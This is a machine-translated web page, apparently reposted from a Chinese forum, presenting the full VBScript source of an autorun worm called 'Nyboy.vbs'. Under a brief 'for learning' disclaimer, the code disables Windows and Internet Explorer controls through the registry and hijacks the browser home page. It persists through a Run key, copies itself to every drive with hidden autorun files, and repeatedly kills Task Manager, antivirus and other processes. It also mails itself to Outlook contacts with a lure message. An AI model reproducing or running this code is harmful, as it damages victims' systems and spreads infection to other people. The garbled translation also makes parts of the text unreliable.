Nyboy.vbs virus Source code released, I came to simulate panda incense _vbs
Source: Internet
Author: User
Use the U disk's friends know that you are a autorun virus, when the double-click Trigger virus body, will copy itself to C D E and system disk system32 inferior letter, (Generate EXE file and a Autorun.inf file), while modifying the registry, When you click on the C disk, the right button, there will be a auto command (black bold) or two start command, I study VBS only 15 days, I also to simulate the Autorun virus and some panda incense function, I have limited ability, can only simulate such a virus, the statement, I simulate this virus, All for learning and technology, should not do damage, if someone with my code to destroy, the consequences of conceit on the error Resume Next
Dim Fso,wsh,myfile,ws,pp,fsofolder
Set Wsh=wscript.createobject ("Wscript.Shell")
Set Fso=wscript.createobject ("Scripting.FileSystemObject")
Set MYFILE=FSO. GetFile (Wscript.scriptfullname)
' Modify the registry (Start menu contents and IE settings)
Wsh. RegWrite "Hklm\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall\checkedvalue", 0, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\restrictions\nobrowsercontextmenu", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowseroptions", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\restrictions\nobrowsersaveas", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\restrictions\nofileopen", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\Control panel\advanced", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\Control panel\cache Internet", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\Control panel\autoconfig", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\Control panel\homepage", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\Control panel\history", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\Control panel\connwiz Admin Lock", 1, "REG_DWORD"
Wsh. RegWrite "HKCU\Software\Microsoft\Internet explorer\main\start Page", "http://ruanji03.ys168.com"
Wsh. RegWrite "HKCU\Software\Microsoft\Internet explorer\main\search Page", "http://ruanji03.ys168.com"
Wsh. RegWrite "HKCU\Software\Microsoft\Internet Explorer\main\default_page_url", "http://ruanji03.ys168.com"
Wsh. RegWrite "HKCU\Software\Microsoft\Internet Explorer\main\default_search_url", "http://ruanji03.ys168.com"
Wsh. RegWrite "Hkey_users\. Default\software\microsoft\internet explorer\main\start Page "," http://ruanji03.ys168.com "
Wsh. RegWrite "Hkey_users\. Default\software\microsoft\internet Explorer\main\default_page_url "," http://ruanji03.ys168.com "
Wsh. RegWrite "Hkey_users\. Default\software\microsoft\internet Explorer\main\default_search_url "," http://ruanji03.ys168.com "
Wsh. RegWrite "Hkey_users\. Default\software\microsoft\internet explorer\main\search Page "," http://ruanji03.ys168.com "
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\Control panel\homepage", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\Control panel\securitytab", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\Control panel\resetwebsettings", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\restrictions\noviewsource", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet explorer\infodelivery\restrictions\noaddingsubscriptions", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nofilemenu", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode", 1, "REG_DWORD"
Wsh. RegWrite "Hklm\software\microsoft\windows\currentversion\run\win32system", "C:\NYboy.vbs"
Wsh. RegWrite "Hklm\software\microsoft\windows\currentversion\run\scanregistry", "" "
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\norun", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\notraycontextmenu", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\noclose", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\startmenulogoff", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nosmhelp", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nonethood", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nowinkeys", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nosetfolders", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\norecentdocsmenu", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nofind", "1", "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nowindowsupdate", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nofavoritesmenu", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\norecentdocshistory", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools", "1", "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled", 1, "REG_DWORD"
' The user cannot open the hard drive by double-clicking it, which can also be modified to make it unable to open the folder by double-clicking the same, not redundant
Wsh. RegWrite "hklm\software\classes\drive\shell\auto\command\", "C:\NYboy.bat '%1 '"
Wsh. RegWrite "hkcr\drive\shell\", "Auto"
Wsh. RegWrite "hkcr\drive\shell\auto\command\", "C:\NYboy.bat '%1 '"
Wsh. RegWrite "hklm\software\classes\directory\shell\", "Auto"
Wsh. RegWrite "hkcr\directory\shell\auto\command\", "C:\NYboy.bat '%1 '"
Wsh. RegWrite "hklm\software\classes\directory\shell\auto\command\", "C:\NYboy.bat '%1 '"
' Modify default file icon Here you can change to a cute panda!
Wsh. RegWrite "hkcr\exefile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hkcr\txtfile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hkcr\dllfile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hkcr\batfile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hkcr\inifile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hklm\software\classes\exefile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hklm\software\classes\txtfile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hklm\software\classes\dllfile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hklm\software\classes\batfile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hklm\software\classes\inifile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hklm\software\classes\.reg\", "txtfile"
Wsh. RegWrite "Hklm\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "Hello, soldier and you have a little joke"
Wsh. RegWrite "Hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext", "You have been poisoned, quickly antivirus or contact with QQ252287438 "
' Copy yourself to C,d,e,f,u disk
Myfile.copy "C:\"
Myfile.copy "D:\"
Myfile.copy "E:\"
Myfile.copy "F:\"
Myfile.copy "I:\"
Myfile.attributes=34
' Define the contents of the Autorun.inf this is the part of the code you must have. Here's a simple way to write
If FSO. FileExists ("C:\autorun.inf") Then
Set objfolder = fso. GetFile ("C:\autorun.inf")
Else
Wsh.run "cmd/c Echo [Autorun]>>c:\autorun.inf" _
& "&& Echo Open=nyboy.bat >>c:\autorun.inf" _
& "&& Echo Shellexecute=nyboy.bat >>c:\autorun.inf" _
& "&& Echo Shell\auto\command=nyboy.bat>>c:\autorun.inf" _
& "&& Echo Shell=auto>>c:\autorun.inf" _
& "&& attrib +h +s +r C:\autorun.inf"
Set Autobatc=fso.createtextfile ("C:\NYboy.bat", 1,ture)
Autobatc.writeline ("Nyboy.vbs")
End If
If FSO. FileExists ("D:\autorun.inf") Then
Set objfolder = fso. GetFile ("D:\autorun.inf")
Else
Wsh.run "cmd/c Echo [Autorun]>>d:\autorun.inf" _
& "&& Echo Open=nyboy.bat >>d:\autorun.inf" _
& "&& Echo Shellexecute=nyboy.bat >>d:\autorun.inf" _
& "&& Echo Shell\auto\command=nyboy.bat>>d:\autorun.inf" _
& "&& Echo Shell=auto>>d:\autorun.inf" _
& "&& attrib +h +s +r D:\autorun.inf"
Set Autobatd=fso.createtextfile ("D:\NYboy.bat", 1,ture)
Autobatd.writeline ("Nyboy.vbs")
End If
If FSO. FileExists ("E:\autorun.inf") Then
Set objfolder = fso. GetFile ("E:\autorun.inf")
Else
Wsh.run "cmd/c Echo [Autorun]>>e:\autorun.inf" _
& "&& Echo Open=nyboy.bat >>e:\autorun.inf" _
& "&& Echo Shellexecute=nyboy.bat >>e:\autorun.inf" _
& "&& Echo Shell\auto\command=nyboy.bat>>e:\autorun.inf" _
& "&& Echo Shell=auto>>e:\autorun.inf" _
& "&& attrib +h +s +r E:\autorun.inf"
Set Autobate=fso.createtextfile ("E:\NYboy.bat", 1,ture)
Autobate.writeline ("Nyboy.vbs")
End If
If FSO. FileExists ("F:\autorun.inf") Then
Set objfolder = fso. GetFile ("F:\autorun.inf")
Else
Wsh.run "cmd/c Echo [Autorun]>>f:\autorun.inf" _
& "&& Echo Open=nyboy.bat >>f:\autorun.inf" _
& "&& Echo Shellexecute=nyboy.bat >>f:\autorun.inf" _
& "&& Echo Shell\auto\command=nyboy.bat>>f:\autorun.inf" _
& "&& Echo Shell=auto>>f:\autorun.inf" _
& "&& attrib +h +s +r F:\autorun.inf"
Set Autobatf=fso.createtextfile ("F:\NYboy.bat", 1,ture)
Autobatf.writeline ("Nyboy.vbs")
End If
If FSO. FileExists ("I:\autorun.inf") Then
Set objfolder = fso. GetFile ("I:\autorun.inf")
Else
Wsh.run "cmd/c Echo [Autorun]>>i:\autorun.inf" _
& "&& Echo Open=nyboy.bat >>i:\autorun.inf" _
& "&& Echo Shellexecute=nyboy.bat >>i:\autorun.inf" _
& "&& Echo Shell\auto\command=nyboy.bat>>i:\autorun.inf" _
& "&& Echo Shell=auto>>i:\autorun.inf" _
& "&& attrib +h +s +r I:\autorun.inf"
Set Autobatf=fso.createtextfile ("I:\NYboy.bat", 1,ture)
Autobatf.writeline ("Nyboy.vbs")
End If
' Set virus body properties for system read-only Hide
Wsh.run "cmd/c attrib +h +s +r" _
& "&& attrib +h +s +r D:\NYboy.bat" _
& "&& attrib +h +s +r E:\NYboy.bat" _
& "&& attrib +h +s +r F:\NYboy.bat" _
& "&& attrib +h +s +r I:\NYboy.bat"
"Forced to end certain processes, such as QQ, Notepad, Web pages, batch files, Kabbah, Realplay and other processes, run after the file does not open
Todo
Set Ws=getobject ("Winmgmts:\\.\root\cimv2")
Set Pp=ws.execquery ("SELECT * from Win32_Process where name= ' taskmgr.exe ' or name = ' QQ.exe ' or name = ' notepad.exe ' or name ') = ' IEXPLORE.exe ' or name = ' cmd.exe ' or name = ' Avp.exe ' or name = ' WinRAR.exe ' or name = ' Realplay.exe ' or name = ' WINWORD.exe '")
For all I in pp
I.terminate ()
Wscript.Sleep 100
Next
Loop
' Enables viruses to be transmitted by mail
Set ol=createobject ("Outlook.Application")
On Error Resume Next
For X=1 to 5
Set Mail=ol. CreateItem (0)
Mail.to=ol. GetNamespace ("MAPI"). AddressLists (1). AddressEntries (x)
Mail.subject= "Are you coming tonight?" "
mail.body= "friend Hello: your friend sent you a warm invitation." Please read the attached letter, wish you good luck! QQ Dating Channel "
MAIL.ATTACHMENTS.ADD ("C:\NYboy.vbs")
Mail.send
Next
Ol. Quit
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
